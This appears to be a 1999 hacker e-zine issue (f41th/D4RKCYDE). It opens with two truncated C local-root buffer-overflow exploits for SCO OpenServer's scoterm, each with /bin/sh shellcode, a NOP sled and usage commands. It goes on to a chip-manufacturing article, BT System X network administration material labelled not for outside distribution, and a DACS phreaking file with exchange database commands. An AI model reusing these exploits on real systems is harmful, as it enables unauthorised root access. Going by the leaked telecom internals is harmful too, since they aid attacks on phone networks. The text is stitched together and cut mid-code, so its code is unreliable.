 * $ /usr/bin/X11/scoterm -geometry `scotermx 0`
 * or
 * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`
 *
 * Note: scoterm need to be run from a valid x-display
 *
 * By: The Dark Raver of CPNE (Murcia/Spain - 21/6/99)
 *
 * -
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"\xeb\x1b"                      // start: jmp uno
"\x5e"                          // dos: popl %esi
"\x31\xdb"                      // xorl %ebx,%ebx
"\x89\x5e\x07"                  // movb %bl,0x7(%esi)
"\x89\x5e\x0c"                  // movl %ebx,0x0c(%esi)
"\x88\x5e\x11"                  // movb %bl,0x11(%esi)
"\x31\xc0"                      // xorl %eax,%eax
"\xb0\x3b"                      // movb $0x3b,%al
"\x8d\x7e\x07"                  // leal 0x07(%esi),%edi
"\x89\xf9"                      // movl %edi,%ecx
"\x53"                          // pushl %ebx
"\x51"                          // pushl %ecx
"\x56"                          // pushl %esi
"\x56"                          // pushl %esi
"\xeb\x10"                      // jmp execve
"\xe8\xe0\xff\xff\xff"          // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/

#define OFF 0x80452ff // SCO OpenServer 5.0.4
#define ALINEA 1
#define LEN 2000

int main(int argc, char *argv[]) {
  int offset=0;
  char buf[LEN];
  int i;

  if(argc < 2) {
    printf("Usage: scotermx \n");
    exit(0);
  } else {
    offset=atoi(argv[1]);
  }

  memset(buf,0x90,LEN);
  memcpy(buf+1000,hell,strlen(hell));
  for(i=1100+ALINEA;i

 Local root exploit
 *
 * Offset: /usr/bin/X11/scoterm => Work only against patched binaries,
 * for default binaries use the old exploit.
 * -2000 -> Started from scoterm or xterm on localhost
 * 0 -> Started from remote telnet (with valid display parameter)
 *
 * Usage:
 * $ cc st2.c -o st2
 * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `st2 0`
 *
 * By: The Dark Raver of CPNE (Spain - 5/8/99)
 *
 * -
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"\xeb\x1b"                      // start: jmp uno
"\x5e"                          // dos: popl %esi
"\x31\xdb"                      // xorl %ebx,%ebx
"\x89\x5e\x07"                  // movb %bl,0x7(%esi)
"\x89\x5e\x0c"                  // movl %ebx,0x0c(%esi)
"\x88\x5e\x11"                  // movb %bl,0x11(%esi)
"\x31\xc0"                      // xorl %eax,%eax
"\xb0\x3b"                      // movb $0x3b,%al
"\x8d\x7e\x07"                  // leal 0x07(%esi),%edi
"\x89\xf9"                      // movl %edi,%ecx
"\x53"                          // pushl %ebx
"\x51"                          // pushl %ecx
"\x56"                          // pushl %esi
"\x56"                          // pushl %esi
"\xeb\x10"                      // jmp execve
"\xe8\xe0\xff\xff\xff"          // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/

#define OFF 0x7fffeb80 // SCO OpenServer 5.0.4
#define ALINEA 2
#define LEN 1500

int main(int argc, char *argv[]) {
  int offset=0;
  char buf[LEN];
  int i;

  if(argc < 2) {
    printf("Usage: st2 \n");
    exit(0);
  } else {
    offset=atoi(argv[1]);
  }

  memset(buf,0x90,LEN);
  memcpy(buf+600,hell,strlen(hell));
  for(i=700+ALINEA;i

 by hitman <----------------------------------+
+-+[ D4RKCYDE ]+---> <----------------------------------+
| : .

[Making A Computer Chip Part A]
>>>>>>>>>>>>h1tman<<<<<<<<<<<<<

/* I did not write this article, my comp science teacher gave it to */
/* me and i am merely typing it up for informational purposes only */

A computer chip is made by building layers of electronic pathways and connections using conducting and non-conducting materials on a surface of silicon.
The combination of these materials into specific patterns forms microscopic electronic components such as transistors, diodes, resistors, and capacitors; the basic building blocks of electronic circuits. Connected together on a chip, these components are referred to as an integrated circuit. The application of the conducting and non-conducting materials to the silicon base is done through a series of technically sophisticated chemical and photographic processes. Some of the manufacturing steps are shown in the following paragraphs.

A computer chip begins with a design developed by engineers using a computer aided circuit design program. In order to better view the design, greatly enlarged printouts are prepared. Some chips only take a month or two to design while others may take a year or more. A separate design is required for each layer of the chip. Most chips have at least four to six layers but some have up to fifteen.

Although other materials can be used, the most common raw material used to make chips is silicon crystals that have been refined from quartz rocks. The silicon crystals are melted and formed into a cylinder five to ten inches in diameter and several feet long. After being smoothed, the silicon ingot is sliced into wafers four to eight inches in diameter and 4/1000 of an inch thick.

Much of the chip manufacturing is performed in special laboratories called clean rooms. Because even the smallest particle of dust can ruin a chip, the clean rooms are kept 1000 times cleaner than a hospital operating room. People who work in these facilities must wear special protective clothing called bunny suits. Before entering the manufacturing area, the workers remove any dust on their suits in an air shower.

After the wafer has been polished and sterilized, it is cleaned in a chemical bath. Because the chemicals used in the cleaning process are dangerous, this step is usually performed by a robot.
After cleaning, the wafers are placed in a diffusion oven where the first layer of material is added to the wafer surface. Other materials, called dopants, are added to the surface of the wafer in a process called ion implantation. The dopants create areas that will conduct electricity. Channels in these layers of materials are removed in a process called etching. Before etching, a soft gelatin-like emulsion called photoresist is added to the wafer.

During photolithography, an image of the chip design, called a mask, is used as a negative. The photoresist is exposed to the mask using ultraviolet light. Ultraviolet light is used because its short wavelength can reproduce very small details on the wafer. Up to 100 images of the chip design are exposed on a single wafer. The photoresist exposed to the ultraviolet light becomes hard and the photoresist covered by the chip design on the mask remains soft. The soft photoresist and some of the surface materials are etched away with hot gases, leaving what will become circuit pathways.

The process of adding material and photoresist to the wafer, exposing it to ultraviolet light, and etching away the unexposed surface, is repeated using a different mask for each layer of the circuit. After all circuit layers have been added, individual chips on the wafer are tested by a machine that uses probes to apply electrical current to the chip circuits.

In a process called dicing, the wafers are cut with a diamond saw into individual chips called die. Die that have passed all tests are placed in a ceramic or plastic case called a package. Circuits on the chip are connected to pins on the package using gold wires. Gold is used because it conducts electricity well and does not corrode. The pins connect the chip to a socket on a circuit board.

Continued in Part B...

. : |
+-+[ System X network administration ]+---> by hybrid <----------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <----------------+
| : .
_\|/_ [ GBH ] Gwahn Burnin Haxorz [ GBH ] _\|/_

BT Network Administration Support System Development
SYSTEM X and OMC network operations..
BT PhoneBone tekniq
By hybrid

NOT TO BE SHOWN OUTSIDE BT.
GBH internal awarez.

[ _\|/_ ]
| GBH |
: :
. .

PART I (Introduction to BT management on the PSTN)

Introduction

The technology within the network has advanced through digitalisation of both transmission and switching, and the introduction of computer-controlled network elements. The greater reliability of this technology and the ability to manage and configure the elements remotely has created new opportunities for efficient management of the network. These opportunities have been translated into a vision for the future operation and management of the network, initially through the Network Administration Task Force (NATF) and subsequent refinements in terms of architecture (Network Management Architecture), and process (Strategic Systems Plan (SSP)).

THE VISI0N

The vision can be summarised as:

-+ end-to-end network management
-+ functional coverage of the whole network life cycle
-+ fully integrated functionality
-+ high levels of automation/decision support
-+ conformant to architectural objectives:
   a) network management hierarchy
   b) co-operative network architecture
   c) open systems platform

End-to-End management

It is essential to be able to manage networks made up of elements from different vendors and different generations of equipment in a consistent manner, so that the network can be viewed as a complete entity which provides a managed service platform.
Whole Life Cycle

Networks and services must be managed from 'cradle to grave' (figure 1), covering:

-+ forecasting
-+ requirements analysis
-+ detailed dimensioning and project planning
-+ data building
-+ installation and commissioning
-+ maintenance/billing/traffic management
-+ repair
-+ performance
-+ enhancement/withdrawal

[FIGURE 1: NETWORK AND SERVICE LIFE CYCLE. A three-cornered cycle with the labels: future service, pre-service, requirements, data building, forecasting, installing, performance, commissioning, statistics, billing, maintenance, traffic management, repair.]

Hands free operation

It is essential to give network managers a high level of automation in order to enable them to cope with the levels of complexity involved, vast amounts of data, apparently random nature of problems, and the need for speed, accuracy and consistency in decision making. This requires:

-+ incidents to be analysed automatically with the manager's concurrence being sought to the solution offered;
-+ automatic restoration of service to be achieved whenever possible;
-+ jobs dispatched to the workforce based on an optimum approach to jeopardy, costs, tactics and company image.
-+ customer notification of service affected generated automatically to the appropriate customer-facing unit; and
-+ performance statistics kept and analysed on all key processes.

Development challenges

The challenge for the system developers is to be responsive and meet new requirements quickly, while producing enduring systems which fit within an integrated set (the jigsaw), the whole evolving towards the Network Administration Implementation Program (NAIP) and SSP vision in a cost effective manner. The developers have to move from a position of well over 200 systems, most of which do not interwork, and many of which no longer offer all the essential functions, to a set of around 40 fully integrated high functionality key systems.
Functions must be brought into line with the required business processes and must evolve to match the demands of new network technologies; for instance, planning rules for fibre systems must be continually reviewed to encompass increasing capacities and repeaterless operation. Systems must also take account of the changing operational organisations and procedures, framework which can evolve without damaging the software investment already made. Solutions have to be achieved within four planes of change as illustrated in figure 2.

[FIGURE 2: linked planes of change. The NETWORK plane is shown linked to three others:
   USER ORGANISATION: people, groups/duties, skillz, procedures
   NETWORK MANAGEMENT FUNCTIONS: maintenance, planning, repair control, traffic/control, data building
   COMPUTING AND HOST ARCHITECTURE: computers, terminals, database, etc.]

PART II (Administration of BT Network layers) ohday.

-+ Interface Architecture

The interface architecture provides the means to link all the pieces of the jigsaw together. By a mix of Open Systems Interconnection (OSI) products and pragmatic proprietary products (for example, SNA, DECNET), a communications infrastructure will be deployed to connect users to systems, systems to other systems for information sharing, and systems to the network elements they are managing. Key standards for these interfaces are being defined in the Co-Operative Networking Architecture (CNA-M) programme.

-+ Data Architecture

Data architecture offers the ability to standardise what the processes need to talk about.
Defining the structure and format of the key information items provides a common currency which may be shared by the complete family of support systems. The object orientated style of the CNA-Management communications protocols will force the standardisation of objects as well as simple data structures in the CNA-M programme and external standards bodies like ISO, CCITT and the OSI Network Management Forum.

-+ System (Computing) Architecture

The system architecture defines how a particular system is constructed, rather than the functional role it plays within the jigsaw. This deals with the following main components.

-+ computer hardware
-+ operating system
-+ database management system
-+ transaction processing
-+ communications drivers
-+ man-machine interfacing (MMI), and
-+ application programming interface (API).

There is a drive by the computing industry to create standard open interfaces to these elements, based on UNIX/POSIX and X Open standards, to produce the open platform. The system developers are also driving towards reusable sub-functions and utilities. These two initiatives are being brought together in the Generic Systems Architecture (GSA).

-+ Integration and evolution

SSP, ONA-M, Generic Systems Architecture and the Network Control Architecture Board (NCAB) 5 year vision for support systems evolution have all contributed to creating a clear picture of how support systems will look in the future. It is important, however, that a very pragmatic approach is taken to realising this vision.

-+ SWITCH MANAGEMENT

BT switch management is carried out by the OMC (Operations Maintenance Center) for local exchanges and the operations and maintenance unit support system (OMUSS) (an OMC derivative) for trunk exchanges. This system has clocked up over 3000 system months of reliable service since its introduction in 1984. As the first major network management system, it has paved the way for the NACC/NOU structure.
[Diagram: support systems and the switch hierarchy. Upper layer: CSS, NMW2, DCSS, NOMS 2 and NOMS 1. Middle layer: FAS, OMC, TMS and OMUSS, with ALARMS. Network layer: HOUSE, LOCAL, TRUNK and INTERNATIONAL exchanges linked in a chain, with DDC feeding DESS.]

-+ CSS   : Customer Service System
-+ NMW2  : Network Management Workstation
-+ DCSS  : District Control Support System
-+ NOMS  : Network Operations Management System
-+ FAS   : Fibre Access System
-+ OMC   : Operations and Maintenance Center
-+ TMS   : Transmission Monitoring System
-+ DDC   : District Data Collector
-+ DESS  : Digital Exchange Support System
-+ OMUSS : Operations and Maintenance Unit Support System

There are over 60 systems in field service, with over 10,000 registered users, covering all trunk and local System X and AXE switches. Enhancement continues to run at a considerable pace, working its way into the field through two major releases per year.
[Diagram: OMC structure. Labelled elements: EXCHANGE A through EXCHANGE Z; the OMS, containing SRS and LECS and listing user facilities/duties, on DEC VAX H/W; an alarms handling system; a terminal display; and four connections out of the OMS marked A) administration users, B) maintenance users, C) remote users, D) other systems.]

-+ OMS  : Operational Maintenance System
-+ SRS  : Subscribers Record System
-+ LECS : Local Equipment Computer System

The system is based on a VAX/VMS platform with Oracle relational database, its own basic forms/menus man-machine interface and X.25/V.24 communications drivers. The Exchange interfaces are controlled through flexible data-driven translators and the basic structure of the system is highly modular. The priority evolution steps for OMC are:

-+ interoperability with CSS, the transmission network surveillance (TNS) system and workforce management (NOMS2)
-+ additional exchange interfaces for advanced services unit (ASU) etc.,
-+ adoption of advanced workstation (NMW2) man-machine interfacing
-+ donation of functions to Generic Event Management (GEMS).

-+ Transmission Management

The transmission monitoring system (TMS) provides a comprehensive surveillance system for the transmission aspects of the network. While the OMC manages a smaller set of complex network elements, the TMS faces the challenge of collecting, collating and displaying information from a vast array of physically dispersed components. After field-trial stages and recent product trials in London, the TMS is now being rolled out into the three pilot NOU catchment areas.
The major TNS functions are:

-+ alarm reception, display, filing, retrieval and archiving
-+ alarm association and comparison;
-+ performance data processing and display
-+ access to other systems (for example, the junction network system (JNS) database).

-+ Local Access Management

The flexible access system (FAS) is a system which has been developed to manage fibre in the local loop. Systems have been installed for the City Fibre Network and Docklands. The support system, the service access control center (SACC), once more shares a common lineage and technology platform with OMC combined with the ICENI database produced by NMD, and used as an element in the service desk and facilities management systems.

FAS was the first system to attempt to adopt the network management hierarchy, with well defined interfaces between the service access control center (SACC) (network level controller) and element managers developed by equipment suppliers. It also adopted the network management workstation (NMW1) to remove a multitude of various terminals. Until the future of the FAS is fully determined, the SACC will not be enhanced and evolved. However, the structure of future advanced local access management is being considered based on experience of FAS, LLOFT (the local loop optical fibre trial) and cable TV management.

-+ Data management and performance analysis

The digital exchange support system (DESS) consists of many applications which are grouped together under a single code name. Some of the functions these applications perform are:

-+ data build for new exchanges and major upgrades
-+ generic network performance statistics by analysing the large volume of data generated by switches
-+ providing national reference source for charging information, and associated validation tools to ensure charging integrity
-+ providing a database and tracking mechanism for all exchange incident reports; and
-+ a register of the hardware and software build levels for all exchanges in the network.
DESS is a major system which runs on the largest VAX cluster configurations in the world. It supports a population of 2000 users, 140 of which may be simultaneously logged into the system. A typical daily workload for DESS would be analysing 1-4 Gigs of exchange generated data, producing 35 thousand pages of printout, and writing or reading 1500 exchange cartridges.

COMING SOON... NOMS INTERNAL NETWORKING OPER4TIONS.

. . : |
+----+ GBH -+o
|    +----> psyclone -+o   +[ 4 HORSEMAN OF THE PSTN NINJ4 APPOCALIPZ ]+--
+----> hybrid -+o          +[ GWAHN BURN'IN H4X0RZ ]+--
+----> gr1p -+o
+----> kp -+o-----+[ _\|/_ ]
| | : : . .

-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ G ]-+
-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ B ]-+
-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ H ]-+

. : |
+-+[ digital access carrier system DACS ]+---> by hybrid <-------------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-------------+
| : .

BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ]

Digital Access Carrier System DACS
by hybrid

How did I get this info? -- Well the truth is, as a young child I was abducted by extra terrestrial biological entities who hardwired microchips in my brain that allow me to intercept the thoughts of telecommunications engineers via ESP.. I was told to gather intricate information about the planet Earth's international PSTN, so when my people from the distant world of xinbin come to inhabit the planet, they can use the information I have transmitted to them from the microchips in my brain as a means to take over our communication networks... er, shit, thats not rite (better lay off the caffeine for a bit).. What I meant to say was, a friend of mine werks for BT, and gave me some nice info on DACS :) -werd

Introduction.

Digital Access Carrier System is used by British Telecom to transform one residential line into two separate lines without actually installing an additional trunk pair.
The idea of DACS is very similar to the design and implementation of the WB9OO unit used in the past (http://hybrid.dtmf.org/files/hybrid-files/wb900.txt). The DACS system is becoming increasingly popular in the UK because more and more people are requesting additional lines, usually for net access.

                     Digital Access Carrier System
              _____________                    _____________
          B1 |             |                  |             | B1
-------------O             |  single pair of  |             O-------------
             |             |  wires (trunk)   |             |
    analogue |     E.U     O==================O     E.U     | analogue
             |             |     digital      |             |
-------------O             |                  |             O-------------
          B2 |_____________|                  |_____________| B2

The chances are, if you order another line from BT, they will simply multiplex your existing line into 2 separate carriers. Think about it.. if you have one line operating on a dedicated carrier, then the line is multiplexed into 2 separate carriers, the bandwidth will be cut in half. To this date, BT are encouraging its customers to join the 'BT SuperHighway' by installing a second line.. What BT don't tell you is that you will only be able to get a maximum of 28.8bps from your 'second' line. In this file, I'll look into the DACS carrier system in detail, as well as ways to determine what kind of trunk installation you have if you have ordered a second line from BT. Werd, enjoy the file..

DACS II

The original DACS system had limited capabilities, and did not allow the customer to have CLASS services on their line. The newer DACS implementation is called DACS II and allows a slightly more advanced service to customers. Now people with DACSII units on their line have access to CLASS (Customer Loop Access Signalling System). The new DACS hardware allows customers' lines to have K Break (Disconnect Clear), as well as common services such as CLI, which were previously unavailable to DACS I customers.

At the eXchange

All exchanges have a database of different customers who have been fitted with the DACS equipment.
Some of the commands used on the CSS database at the local terminating exchange are as follows:

  DISPLAY FRAME TERMINATION RANGE  (to see if DACS equipment is fitted to
                                    the exchange)
  DISPLAY FRAME JUMPER             (to determine whether a particular
                                    customer is using DACS1 or DACS2)

Remote End eXchange records

The Local Network Records (CSS/LNR) are modified/edited as follows on the O/S at the exchange:

  ENTER SHARED USE
  MODIFY SHARED USE
  DISPLAY ROUTING
  INVALID COMMAND

Compatibility of DACS:

GOOD..

  The provision of PSTN services when used with only BABT-approved
  Customer Premises Equipment up to 4 REN.
  Use of any phone exchange within BT's access network, except the
  following:
  Inter working with all BT's remote line test systems
  Self contained payphones
  Lines utilising CLASS
  K Break
  All modems up to 14.4bit/S working
  Group 1,2,3 fax machines
  Video phones

BAD..

  Earth calling PBX's
  Equipment that uses SPM (meter pulsed payphones)
  Private Services
  ISDN2
  Steel joint user poles
  Certain TXE2 exchanges
  300 kilohms loop calling
  Electricity stations
  DDI
  Group 4 fax machines

DACS system schematics, diagrams..

Old Jumpering Procedure

  [ ascii diagram not recoverable. Labels: E side, L side, exchange sub
    number, external bar pair cable, DACS block (T, B1, B2), DACS shelf ]

New Jumpering Procedure

  [ ascii diagram not recoverable. Labels: E side, L side, exchange sub
    number, DACS B1 B2 (DACS shelf), DACS trunk CH1 CH2 (DACS shelf),
    external bar pair cable ]

E.U Card Setup

  [ ascii diagram not recoverable. Labels: on/off switch, positions 1 to 8,
    B.E.R connector, sw7O9, sw7O3, sw7O6, sw7OO, c, r, b2, b1, a3, a1 ]

DACS 2A EU

  [ ascii diagram not recoverable. Labels: SW 1O1 (imp) positions 1 to 4
    and (class) positions 1 to 4, cpx, 6OO, en; SW 1O2 off/on, 1Ok, 15k,
    (alarm) positions 1 and 2, (sign) positions 1 and 2 ]

External RU Setup

  [ ascii diagram not recoverable. Labels: BT66, B1, B2, wire colours
    white, blue, grey, orange, tail, trunk ]

MIMIC Resistances

  [ ascii diagram not recoverable. Labels: CSS TEST ACCESS, a, b, b1, b2,
    EU, TRUNK, RU, NTE; switch 5 on (cal) 1k ohm loop; switch 5 off (ug)
    10k ohm -50v leg b2 ]

  s/c b1 + b2      10k ohm -50v a leg b2      1k ohm loop b1 or b2
  EU fault         TRUNK fault                customer apps fault

Welp, that's it for this DACS oday info. Hope someone can find some use of it, HEH. Big shouts to gr1p, b4b0, 9x, substance, psyclone & GBH krew, tip, jorge, lusta, pbxphreak, bodie, zomba, jasun, oclet, knight, epoc, nou, everyone in #darkcyde, #b4b0, #9x HEH, werd to D4RKCYDE.. 2 years going str0ng.

"that ascii took me fuckin ages.."

the urls..

  http://b4b0.org              b4b0
  http://darkcyde.phunc.com    f41th
  http://www.ninex.com         9x
  http://hybrid.dtmf.org       BL4CKM1LK hardcore teleph0n1cs.. (GO NOW!)

ATE/>exit
+++
NO CARRIER

------------------------------------------------------------------------------
B L 4 C K M 1 L K teleph0nics            FUCKIN HARDCORE, BABY
http://hybrid.dtmf.org/
------------------------------------------------------------------------------

 .
 :
 |
 +-+[ outness ]+---> by jasun <-----------------------------------------------+
 +-+[ D4RKCYDE ]+---> <----------------------------------------------+
 |
 :
 .

If you would like to submit an article for publication in f41th, please ensure that it complies with the following:

  [ all articles sent to f41th must be original work ]
  [ all articles must be at least 15K in size ]
  [ all articles must be in pure .txt format ]
  [ all articles sent to f41th should not be released anywhere else ]

If you are sending us an article that you want to have published in f41th, put [ f41th ] in the subject header in enclosed square brackets. All other mail without that header will be considered as reader feedback mail and will not appear in f41th.

Visit #darkcyde on EFnet and idle with the D4RKCYDE members, supporters, friends and anyone else who happens to hang out there and sometimes chat!

Use one of the following addresses to send us comments and articles. You may also use the f41th PGP key to send us secure encrypted email, which can be found below.

  [ hybrid@dtmf.org ]
  [ hybrid@ninex.com ]
  [ zomba@phunc.com ]

Type Bits/KeyID    Date       User ID
pub  2048/4D077481 1999/07/30 f41th

#darkcyde EFnet
http://darkcyde.phunc.com
[C] D4RKCYDE Communications

EOF.